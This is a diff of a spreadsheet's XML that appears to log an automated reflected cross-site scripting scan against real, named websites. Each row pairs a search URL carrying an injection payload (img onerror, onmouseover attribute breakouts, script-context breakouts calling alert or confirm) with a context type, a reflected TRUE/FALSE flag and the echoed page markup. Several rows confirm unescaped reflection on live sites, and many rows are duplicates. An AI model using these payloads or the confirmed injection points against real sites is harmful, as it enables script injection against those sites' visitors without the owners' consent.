+          <t xml:space="preserve">&lt;form class="challenge-form" id="challenge-form" action="/search?q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;amp;__cf_chl_captcha_tk__=d4879bc27ec4e4c672113c77dbbfd8e2ccd056d7-1589202655-0-Ad3UaXafw4cN6J3g_6eVrRRTbm5GD9F1FTcsfz2xuCWzmiLg-LE7YwfeY5XBlfq9_M3DQpa5G0Z1pvojsO91HZ-NSVME4WlpapYofjPhE9wAwbrdY7ZeaIjX8ZYrWV-8rS90LhpOmiOLQ3jD6anS49NGUBNc5dtF6ELU0O9BoHmPbWNu7Kf4S8fUJU99lfaN5Cweuw8JX0mh1M025evkkpxEZg5SpWmJNUyuoDqnMb7sBFiXqkNQstCdVyJRByC4lyu2hoC6MtPwpwifiXWVFuIqNU_-AYJAnCTp2C-Hdi_3X6mFIski6h66ithQYv-m-41YTKo_XGx5AeZxik9Zq1MqAqT40AwJmHwegVRiYC-wfFgqQnQEaeshTvlNEhhrQyFnLdBCQvzZneVfrdpM_WxV0pus_3Ra5XSMxWsU69TcPy-4-r-dBLsZEHxgRgJYi_OWj2VubfHcBb7Mb5krMQ5SMLK9U4Ue91FjU5n29tauE5KH8XfXmpG7Gp-PyCG2rlOax7KVY91MCqqPyvgl06GLmzRGgRVVw3K1-I-qsJA2nKkyIk-66phpWoVJxlL9Zm2kCTro-FekCT3GaLEoRfw" method="POST" enctype="application/x-www-form-urlencoded"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="83">
+      <c r="A83" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B83" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C83" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D83" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="84">
+      <c r="A84" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B84" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C84" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D84" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="85">
+      <c r="A85" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B85" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C85" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D85" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="86">
+      <c r="A86" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B86" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C86" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D86" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="87">
+      <c r="A87" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B87" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C87" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D87" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="88">
+      <c r="A88" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B88" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C88" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D88" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="89">
+      <c r="A89" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B89" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C89" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D89" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="90">
+      <c r="A90" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B90" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C90" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D90" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="91">
+      <c r="A91" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B91" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C91" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D91" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="92">
+      <c r="A92" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B92" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C92" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D92" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="93">
+      <c r="A93" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B93" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C93" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D93" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="94">
+      <c r="A94" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B94" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C94" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D94" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="95">
+      <c r="A95" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B95" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C95" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D95" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="96">
+      <c r="A96" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B96" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C96" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D96" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="97">
+      <c r="A97" t="inlineStr">
+        <is>
+          <t>https://celticbydesign.com/search?q='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B97" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C97" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D97" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="98">
+      <c r="A98" t="inlineStr">
+        <is>
+          <t>https://celticbydesign.com/search?q='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B98" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C98" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D98" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="99">
+      <c r="A99" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B99" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C99" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D99" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="100">
+      <c r="A100" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B100" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C100" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D100" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="101">
+      <c r="A101" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B101" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C101" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D101" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="102">
+      <c r="A102" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B102" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C102" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D102" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert`1`"&gt; , &lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert`1`"&gt; , &lt;a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=" onmouseover="alert`1`"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="103">
+      <c r="A103" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B103" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C103" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D103" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert`1`"&gt; , &lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert`1`"&gt; , &lt;a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=" onmouseover="alert`1`"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="104">
+      <c r="A104" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B104" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C104" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D104" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta NAME="keywords" content="" onmouseover="alert`1`, " onmouseover="alert`1` datasheet pdf, " onmouseover="alert`1` data sheet, Datasheet4U.com"&gt; , &lt;meta NAME="description" content="" onmouseover="alert`1`, " onmouseover="alert`1` datasheet pdf, " onmouseover="alert`1` data sheet, Datasheet4U.com"&gt; , &lt;link rel="canonical" href="/share_search.php?sWord=" onmouseover="alert`1`"&gt; , &lt;input type="text" name="sWord" size="30" value="" onmouseover="alert`1`" style="width:300px;height:45px; border:solid 3px #1887DB; font-size:20"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="105">
+      <c r="A105" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B105" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C105" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D105" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror='alert`1`'&gt; circuit, &lt;img src=x onerror='alert`1`'&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror='alert`1`'&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="106">
+      <c r="A106" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B106" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C106" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D106" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror="alert`1`"&gt; circuit, &lt;img src=x onerror="alert`1`"&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror="alert`1`"&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="107">
+      <c r="A107" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B107" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C107" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D107" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror='alert`1`'&gt; circuit, &lt;img src=x onerror='alert`1`'&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror='alert`1`'&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="108">
+      <c r="A108" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B108" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C108" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D108" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror="alert`1`"&gt; circuit, &lt;img src=x onerror="alert`1`"&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror="alert`1`"&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="109">
+      <c r="A109" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B109" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C109" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D109" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;script type="text/javascript"&gt;
+ dataLayer = [{ 'post_page':'Search','post_pn':''; confirm`1`; '','post_id':'Search'}]; 
+&lt;/script&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="110">
+      <c r="A110" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B110" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C110" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D110" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="111">
+      <c r="A111" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B111" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C111" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D111" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta NAME="keywords" content="" onmouseover="alert`1`, " onmouseover="alert`1` datasheet pdf, " onmouseover="alert`1` data sheet, Datasheet4U.com"&gt; , &lt;meta NAME="description" content="" onmouseover="alert`1`, " onmouseover="alert`1` datasheet pdf, " onmouseover="alert`1` data sheet, Datasheet4U.com"&gt; , &lt;link rel="canonical" href="/share_search.php?sWord=" onmouseover="alert`1`"&gt; , &lt;input type="text" name="sWord" size="30" value="" onmouseover="alert`1`" style="width:300px;height:45px; border:solid 3px #1887DB; font-size:20"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="112">
+      <c r="A112" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B112" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C112" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D112" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror='alert`1`'&gt; circuit, &lt;img src=x onerror='alert`1`'&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror='alert`1`'&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="113">
+      <c r="A113" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B113" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C113" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D113" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror="alert`1`"&gt; circuit, &lt;img src=x onerror="alert`1`"&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror="alert`1`"&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="114">
+      <c r="A114" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B114" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C114" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D114" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror='alert`1`'&gt; circuit, &lt;img src=x onerror='alert`1`'&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror='alert`1`'&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="115">
+      <c r="A115" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B115" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C115" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D115" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror="alert`1`"&gt; circuit, &lt;img src=x onerror="alert`1`"&gt; datenblatt, block diagram, schematic, Datasheet4U.com&lt;/title&gt; , &lt;font color="red"&gt;&lt;img src=x onerror="alert`1`"&gt;&lt;/font&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="116">
+      <c r="A116" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B116" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C116" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D116" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;script type="text/javascript"&gt;
+ dataLayer = [{ 'post_page':'Search','post_pn':''; confirm`1`; '','post_id':'Search'}]; 
+&lt;/script&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="117">
+      <c r="A117" t="inlineStr">
+        <is>
+          <t>https://www.datasheet4u.com/search.php?sWord=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B117" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C117" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D117" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="118">
+      <c r="A118" t="inlineStr">
+        <is>
+          <t>https://www.wattpad.com/search/?q=' onmouseover='alert`1`&amp;ref=1</t>
+        </is>
+      </c>
+      <c r="B118" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C118" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D118" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>

--- a/solvingissues/file.xlsx
+++ b/solvingissues/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D118"/>
+  <dimension ref="A1:D145"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
@@ -2875,6 +2875,628 @@
         </is>
       </c>
     </row>
+    <row r="119">
+      <c r="A119" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=' onmouseover='alert`1`&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B119" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C119" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D119" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="120">
+      <c r="A120" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=' onmouseover='alert`1`&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B120" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C120" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D120" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="121">
+      <c r="A121" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=' onmouseover='alert`1`&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B121" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C121" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D121" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="122">
+      <c r="A122" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf='; confirm`1`; '&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B122" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C122" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D122" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="123">
+      <c r="A123" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=' onmouseover='alert`1`&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B123" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C123" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D123" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="124">
+      <c r="A124" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=' onmouseover='alert`1`&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B124" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C124" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D124" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="125">
+      <c r="A125" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=' onmouseover='alert`1`&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B125" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C125" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D125" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="126">
+      <c r="A126" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns='; confirm`1`; '&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B126" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C126" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D126" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="127">
+      <c r="A127" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=' onmouseover='alert`1`&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B127" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C127" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D127" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="128">
+      <c r="A128" t="inlineStr">
+        <is>
